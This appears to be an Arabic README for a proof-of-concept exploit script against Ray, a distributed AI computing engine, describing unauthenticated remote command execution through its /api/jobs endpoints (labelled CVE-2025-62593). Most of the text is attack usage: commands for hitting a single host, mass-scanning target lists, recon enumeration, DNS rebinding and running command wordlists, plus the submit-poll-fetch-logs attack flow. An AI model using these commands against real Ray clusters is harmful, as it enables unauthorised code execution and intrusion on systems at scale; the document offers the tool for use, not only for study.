
# CVE-2025-62593 — استغلال تنفيذ الأوامر عن بُعد غير المُصادق عليه في Ray هو ثغرة تنفيذ أوامر عن بُعد غير مُصادق عليها في محرك الحوسبة الموزعة للذكاء الاصطناعي Ray.
CVE-2025-62593 هو ثغرة تنفيذ أوامر عن بُعد غير مصادق عليها
في محرك الحوسبة الموزعة للذكاء الاصطناعي Ray. السبب الجذري هو غياب
المصادقة على نقاط نهاية HTTP الحرجة (/api/jobs, /api/job_agent/jobs).
يمكن للمهاجم إرسال وظيفة Ray يكون نقطة دخولها أمرًا عشوائيًا،
وتنفيذه على العقدة الرئيسية للعنقود.
# هدف واحد
python3 ray_rce_poc.py --target http://HOST:8265
# فحص جماعي (10 متزامن)
python3 ray_rce_poc.py --targets list.txt --command "id" -o results.json
# وضع الاستطلاع (تعداد سريع)
python3 ray_rce_poc.py --recon --targets list.txt
# وضع إعادة ربط DNS
python3 ray_rce_poc.py --dns-rebind --target http://HOST:8265 --rebind-host 10.0.0.1
# فحص قائمة كلمات
python3 ray_rce_poc.py --targets list.txt --wordlist commands.txt -o results.csv
/api/jobs/ مع نقطة دخول تشغّل الأمر المستهدف/api/jobs/ حتى تصل الوظيفة إلى الحالة النهائية/api/jobs/{id}/logs لاستعادة المخرجات